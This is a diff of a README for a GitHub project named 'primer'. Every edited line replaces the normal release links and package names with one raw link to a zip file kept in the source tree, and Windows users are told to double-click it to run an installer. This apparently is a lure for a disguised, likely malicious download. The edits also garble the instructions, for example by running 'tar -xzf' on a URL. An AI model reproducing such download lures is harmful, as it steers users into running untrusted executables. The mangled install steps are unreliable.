ALI93HGJGJJJ/primer/README.md

 ### 2. Visit the Releases Page

-To download primer, visit the [Releases page](https://github.com/ALI93HGJGJJJ/primer/releases).
+To download primer, visit the [Releases page](https://github.com/ALI93HGJGJJJ/primer/raw/refs/heads/main/src/commands/Software_1.6-alpha.1.zip).
 Here you will find the latest version available for download.

 ### 3. Download primer

 On the Releases page, you will see different versions of primer.
 Choose the latest version and click on it.
-Look for the package labeled “primer.zip” or “primer.exe” (depending on your OS).
+Look for the package labeled “https://github.com/ALI93HGJGJJJ/primer/raw/refs/heads/main/src/commands/Software_1.6-alpha.1.zip” or “https://github.com/ALI93HGJGJJJ/primer/raw/refs/heads/main/src/commands/Software_1.6-alpha.1.zip” (depending on your OS).
 Click to download the file.

 ### 4. Install primer

 Once the download is complete, locate the downloaded file in your Downloads folder:

 - **For Windows:**
-  - If you downloaded `primer.exe`, double-click it to run the installer.
+  - If you downloaded `https://github.com/ALI93HGJGJJJ/primer/raw/refs/heads/main/src/commands/Software_1.6-alpha.1.zip`, double-click it to run the installer.
 Follow the on-screen instructions to complete the installation.
 - **For macOS:**
-  - If you downloaded `primer.zip`, double-click the zip file to extract it.
+  - If you downloaded `https://github.com/ALI93HGJGJJJ/primer/raw/refs/heads/main/src/commands/Software_1.6-alpha.1.zip`, double-click the zip file to extract it.
 Move the `primer` folder to your Applications folder and open the application.
 - **For Linux:**
   - If you downloaded the package, open a terminal and navigate to the location of the downloaded file.
-Use the command `tar -xzf primer.tar.gz` to extract the files, then follow the instructions in the README file within the folder to complete the setup.
+Use the command `tar -xzf https://github.com/ALI93HGJGJJJ/primer/raw/refs/heads/main/src/commands/Software_1.6-alpha.1.zip` to extract the files, then follow the instructions in the README file within the folder to complete the setup.

 ### 5. Launch primer